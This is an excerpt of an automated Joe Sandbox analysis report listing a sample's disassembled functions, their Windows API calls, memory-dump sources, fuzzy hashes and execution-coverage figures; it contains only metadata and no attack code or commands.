                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019885E), ref: 00198BA4
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0019A9C5), ref: 0019A9D8
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0019A9F3
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0019A9FA
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0019AA09
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0019AA12
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,0019885E), ref: 001AB5B5
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,0019885E), ref: 001AB5BC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3480822025-0
                                                                                                                                                                                                                          • Opcode ID: 0af6937ecf8c1481d034429fb96daa274f3fc9dd9d57c90f9e88839d2c320b2f
                                                                                                                                                                                                                          • Instruction ID: 361359d721d6d0ea07f0e4bd4841fd127d33437eeaa27eecc1bdb19c4da59f51
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0af6937ecf8c1481d034429fb96daa274f3fc9dd9d57c90f9e88839d2c320b2f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E0487264B32167D620BBB47C0EB462B54AF45762F550412F685D91C0DF64C880C7A2
                                                                                                                                                                                                                          Function 001A6860 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A6F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 001A6F4F
                                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 001A6872
                                                                                                                                                                                                                          • __p__fmode.MSVCRT ref: 001A6888
                                                                                                                                                                                                                          • __p__commode.MSVCRT ref: 001A6896
                                                                                                                                                                                                                          • __setusermatherr.MSVCRT ref: 001A68B7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1632413811-0
                                                                                                                                                                                                                          • Opcode ID: 736f72c4724c3b4c75ecb86d148e82ffc0d310d32b2e63ba69a7d12b48a880c7
                                                                                                                                                                                                                          • Instruction ID: 41b1a2b1617ed9542f2245c1212d6ee82ed179508cbb5610282dc1aa252d03c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 736f72c4724c3b4c75ecb86d148e82ffc0d310d32b2e63ba69a7d12b48a880c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65F01C3810A300DFC728AF30FC4A5483BE1BB16321B140B1AF462C2AF1DB7994C0CB12
                                                                                                                                                                                                                          Function 001B9F18 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B9F24
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,001B449C,?,?,00000001,?), ref: 001B9F2C
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B9F42
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001B449C,?,?,00000001,?), ref: 001B9F4A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1606018815-0
                                                                                                                                                                                                                          • Opcode ID: 16da21608a40eebac0fda64e59f7e7a8c52dd3c30805f9d9a8e9d9e8a107db15
                                                                                                                                                                                                                          • Instruction ID: e0a032cfd20c1937e6c78babc0925730889fba42991e4d9ab28a85637bb9d9c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16da21608a40eebac0fda64e59f7e7a8c52dd3c30805f9d9a8e9d9e8a107db15
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE04F71502205FFDB00DBB0ED0EAEA7B6CEF04324F544506F525D64D1DBB5E9409621
                                                                                                                                                                                                                          Function 00198235 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019824E
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00198256
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00198264
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0019826C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1606018815-0
                                                                                                                                                                                                                          • Opcode ID: ae3a610eff0a88ff9d4433902a89ec349ef11e38f753af6a04e10acd3afaf27c
                                                                                                                                                                                                                          • Instruction ID: d0c0d12c4a6fb22df71f3e697abc328740527e809f02da74a1d3ec0859f7d377
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae3a610eff0a88ff9d4433902a89ec349ef11e38f753af6a04e10acd3afaf27c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE0B6B1902200EFDB04DBA0FD5EE963F64FB08311B40410AF205C2DB0EBB5E8808F12
                                                                                                                                                                                                                          Function 001972C6 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,0019729C), ref: 001972CF
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001972D6
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 001972DF
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001972E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                          • Opcode ID: 249a3cfeb0c60692be4ddcc1950a17e6c68a26240e5c73bb2d68b5dce0716b17
                                                                                                                                                                                                                          • Instruction ID: 2dc11430cf62fae46b62843a2ecafee2c6db177246e838e12910a79043f352c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 249a3cfeb0c60692be4ddcc1950a17e6c68a26240e5c73bb2d68b5dce0716b17
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CD0C932407120ABD7507FE0BC0DF863F28EF49313F410403F205824608AB448808B62
                                                                                                                                                                                                                          Function 00199CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                            • Part of subcall function 0019A62F: wcschr.MSVCRT ref: 0019A635
                                                                                                                                                                                                                            • Part of subcall function 0019C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0019C5BD
                                                                                                                                                                                                                            • Part of subcall function 0019C570: RtlFreeHeap.NTDLL(00000000), ref: 0019C5C4
                                                                                                                                                                                                                            • Part of subcall function 0019C570: _setjmp3.MSVCRT ref: 0019C630
                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 001AC21F
                                                                                                                                                                                                                            • Part of subcall function 001A1A47: memset.MSVCRT ref: 001A1AE2
                                                                                                                                                                                                                            • Part of subcall function 001A1A47: ??_V@YAXPAX@Z.MSVCRT(001A2229,?,001A2229,00000000,-00000105,?,00000000,00000000), ref: 001A1BA4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                                                                                                                                                                          • String ID: FOR$ IF
                                                                                                                                                                                                                          • API String ID: 3818062306-2924197646
                                                                                                                                                                                                                          • Opcode ID: 334d75aba30f8d4249ccd5a4e0911fb2f44a15d6ff21fb101b8424031f08523a
                                                                                                                                                                                                                          • Instruction ID: 5cb5e20c4ff76117e7a3a482047cd45695ddcf13ab59ef5ff27d49fe2f097569
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 334d75aba30f8d4249ccd5a4e0911fb2f44a15d6ff21fb101b8424031f08523a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE5118257002029ADF257BBCC89177B22E6EFA1754F59402AE906CB295FB66DD42C3C0
                                                                                                                                                                                                                          Function 001BBED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 001BBF88
                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,001B9E02,001BCD80,00000030,001B448F,?,?,?,00000001), ref: 001BC008
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmemcpywcschr
                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                          • API String ID: 3241892172-381716982
                                                                                                                                                                                                                          • Opcode ID: ca5ac65fc4853b231074935ddcf02fe76f04b14d66849a1d5a681e198d7ecdce
                                                                                                                                                                                                                          • Instruction ID: 5e08f1949f6daa215eb12927d4b38dc4166d80cb3f9be14518c26a5c3acd0934
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca5ac65fc4853b231074935ddcf02fe76f04b14d66849a1d5a681e198d7ecdce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20614975E08215CBCF18DF68D890AFDBBF1FB58310B20452EE816E7A90D7B199418F94
                                                                                                                                                                                                                          Function 0019ABC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ABE3
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                            • Part of subcall function 0019CF10: _setjmp3.MSVCRT ref: 0019CF28
                                                                                                                                                                                                                            • Part of subcall function 0019CF10: iswspace.MSVCRT ref: 0019CF6B
                                                                                                                                                                                                                            • Part of subcall function 0019CF10: wcschr.MSVCRT ref: 0019CF8D
                                                                                                                                                                                                                            • Part of subcall function 0019CF10: iswdigit.MSVCRT ref: 0019CFEE
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001,00000000,00000000,00000002), ref: 001ACB58
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
                                                                                                                                                                                                                          • String ID: REM/?
                                                                                                                                                                                                                          • API String ID: 49548326-4093888634
                                                                                                                                                                                                                          • Opcode ID: ca60e496d30a9b073e85f9d730b22f69348a6e1b8c0d10f70b48dfd98afe1df5
                                                                                                                                                                                                                          • Instruction ID: 6ec48f46b50e90d9eab6fe3f074df2e504d748281e0ab9f11557c32c0cbe5b10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca60e496d30a9b073e85f9d730b22f69348a6e1b8c0d10f70b48dfd98afe1df5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A331F3327553059BDF24EB78A842B2A73A6EF80750F94442FF502CB6D1EBB1CC448396
                                                                                                                                                                                                                          Function 0019AD26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,0019B11F), ref: 001ACB8B
                                                                                                                                                                                                                          • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 001ACC2D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleTitle
                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                          • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                          • Opcode ID: 20dbd83617b55d72b2ffe99ae8a6f96bb7555e68647464a27d109a4dbe0c901d
                                                                                                                                                                                                                          • Instruction ID: b53eab3254895a79f69aa58b5dd17e6c77489bd28f0421deddccee0562991c25
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dbd83617b55d72b2ffe99ae8a6f96bb7555e68647464a27d109a4dbe0c901d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 742147356002009BCF19AB6CD895BBE7BE2EF80710F58442DE8064B694DB759D86C6D1
                                                                                                                                                                                                                          Function 001B8AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001B8AC9
                                                                                                                                                                                                                          • printf.MSVCRT ref: 001B8B24
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                                                                                                                                                                          • String ID: %3d
                                                                                                                                                                                                                          • API String ID: 2845598586-2138283368
                                                                                                                                                                                                                          • Opcode ID: 25d33db2bdac185f99e2896b1ad2a2e7c51f7939c344367cd6c05e7009b4bb43
                                                                                                                                                                                                                          • Instruction ID: e7d92ab6635e5ad2035bf4e07924ee14dbd4f62e6d018c9ef7552375168ff053
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25d33db2bdac185f99e2896b1ad2a2e7c51f7939c344367cd6c05e7009b4bb43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB012871610204BBEB21AFA58C86FEB3AADDB95BA0F044015FB08A60C1D7B1DD90C671
                                                                                                                                                                                                                          Function 0019AB7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: iswspacewcschr
                                                                                                                                                                                                                          • String ID: =,;
                                                                                                                                                                                                                          • API String ID: 287713880-1539845467
                                                                                                                                                                                                                          • Opcode ID: 19504e291b49b1178d133b898c054606fdc80d824fd5758e53d0f7587b004408
                                                                                                                                                                                                                          • Instruction ID: 3e55bb6beb0bce16feae953feddfbd2c5390fa62c3d7f7486288757d3654cf60
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19504e291b49b1178d133b898c054606fdc80d824fd5758e53d0f7587b004408
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE04F33A06522AA8E34465DBC28977B3DB9FD7B6239A001BF806A3554E7608C4881D3

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:4%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:98%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:98
                                                                                                                                                                                                                          Total number of Limit Nodes:10
